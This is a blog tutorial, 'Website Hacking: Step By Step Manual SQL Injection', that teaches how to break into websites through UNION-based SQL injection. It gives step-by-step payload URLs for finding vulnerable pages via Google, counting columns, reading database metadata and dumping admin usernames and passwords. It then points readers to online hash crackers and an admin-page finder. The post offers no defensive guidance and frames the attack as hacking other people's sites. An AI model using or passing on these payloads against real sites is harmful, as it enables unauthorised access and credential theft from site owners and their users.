News Ticker

Website Hacking : Step By Step Manual SQL Injection

By Ajay Verma - Monday, 14 July 2014 No Comments
Hello Friends, Once once again i am here with you to explain SQL Injection in more detail on your request.
As i Already Shared some Website Hacking (Authentication Bypass) by SQL Injection Tutorial, but as on your request this time i am going to explain in little deep Step By Step Manual SQL Injection.
So Lets Start From Initial.. :) By Defining What is SQL And SQL Injection ?

SQL stands for Structured Query Language. It is very high level language, Like SELECT,INSERT,DELETE,UPDATE queries are used to select,add data,delete data,update data
respectively.SQL is used to design the databses. The information is stored in databses.
SQL injection is the vulnerability occuring in database layer of application which allow attacker to see the contents stored in database. This vulnerabilty occures when the user's input is not filtered or
improperly filtered.


Now You Wanna Ask What a hacker can do with SQL Injection attack?
well a hacker can do following operation by SQL Injection.
* ByPassing Logins
* Accessing secret data
* Modifying contents of website
* Shutting down the My SQL server

Step 1- Finding Vulnerable Website:
SQL Injection Starts with a vulnerable URL, how it looks like..?? well consider below example
http://unknowndevice64.info/something.php?variable=(some value)

you can find several this type of url by google.. :)

Step 2- Checking the Vulnerability:
How to test whether its Vulnerable or Not..???
its simple, attach a single quote (') at the end of (some value) ie.. 64' url will look like..
http://unknowndevice64.info/something.php?id=64'
If the page remains in same page or showing that page not found, then it is not vulnerable.
If you got an error message just like this, then it means that the site is vulnerable
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

 Step 3- Finding Number of columns:
Our next step is to find the number of columns present in the target database.
For that replace the single quotes(') with "order by n" statement.
Change the n from 1,2,3,4,,...n. Until you get the error like "unknown column ".
For eg:
http://unknowndevice64.info/id.php?id=2 order by 1
http://unknowndevice64.info/id.php?id=2 order by 2
http://unknowndevice64.info/id.php?id=2 order by 3 
If you get the error while trying the "x"th number,then no of column is "x-1".
I mean to say:
http://unknowndevice64.info/id.php?id=2 order by 1(noerror)
http://unknowndevice64.info/id.php?id=2 order by 2(noerror)
http://unknowndevice64.info/id.php?id=2 order by 3(error)

 so now x=3 , The number of column is x-1 i.e, 2.
In case ,if the above method fails to work for you, then try to add the "--" at the end of the statement.
For eg:
http://unknowndevice64.info/id.php?id=2 order by 1--

Step 4- Finding The Vulnerable columns:
 We have successfully discovered the number of columns present in the target database.  Let us find  the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative(i mean id=-2).  Replace the columns_sequence with the no from 1 to x-1(number of columns) separated with commas(,).
For eg:
if the number of columns is 4 ,then the query is as follow:
http://unknowndevice64.info/id.php?id=-2 union select 1,2,3,4--              

If the above method is not working then try this:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,3,4--      

Once you execute the query, it will display the vulnerable column.
--------PIC-----
Bingo,  column '3' and '7' are found to be vulnerable.  Let us take the first vulnerable column '3' . We can inject our query in this column.

Step 5- Finding Version, Database, User :
Replace the 3 from the query with "version()"

For eg:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,version(),4--

Now, It will display the version as 5.0.1 or 4.3. something like this.
Replace the version() with database() and user() for finding the database,user respectively.
For eg:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,database(),4--
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,user(),4--

If the above is not working,then try this:

http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4--

Step 6- Finding the Table Name:
If the Database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind sql injection attack).
Let us find the table name of the database. Replace the 3 with "group_concat(table_name) and add the "from information_schema.tables where table_schema=database()"
For eg:
http://unknowndevice64.info/id.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4 from information_schema.tables where table_schema=database()--

Now it will display the list of table names. Find the table name which is related with the admin or user.
----PIC---
Let us choose the "admin " table.
Step 7- Finding the Column Name:
Similary get all the columns by simply replacing 'table' with 'column'
For eg:
http://unknowndevice64.info/id.php?id=-130 union select all 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database()--
There is a repeating element like in this case is 'id' .From it, we come to know which table number has which columns.
----PIC---

Step 8- Fetching data from columns:
We can fetch the data stored in any column. But the interesting ones here are username and password.
These columns are in first table that is tar_admin. "0x3a" is used simply to insert a colon in result  to separate it, it is hex of colon.
For eg:
http://unknowndevice64.info/id.php?id=-130 union select all 1,group_concat(username,0x3a,password),3,4 from tar_admin--

----PIC---
So finally we got the usernames and passwords on screen. But passwords maybe encrypted.
Mostly these Encryption can be Decrypt, as there are several Online Decryption Websites/Tools are available.. :)
----PIC---

Note:Hashes are type of encryptions which are irreversible.  There are numberless online crackers  available. Keep trying. Sometimes very strong hashes can not be cracked. 

Where is the login panel or login page of website ?
So you got the key, where is lock now ? Most of the websites have login pages at default locations.
You Can Find Admin Loggin Pages By Using My Tool Admin Finder.

 Hope You Like This Tutorial, For Any Other Cyber Help or Query Please Comment Below or You Can Write to me.. :)
unknowndevice64

No Comment to " Website Hacking : Step By Step Manual SQL Injection "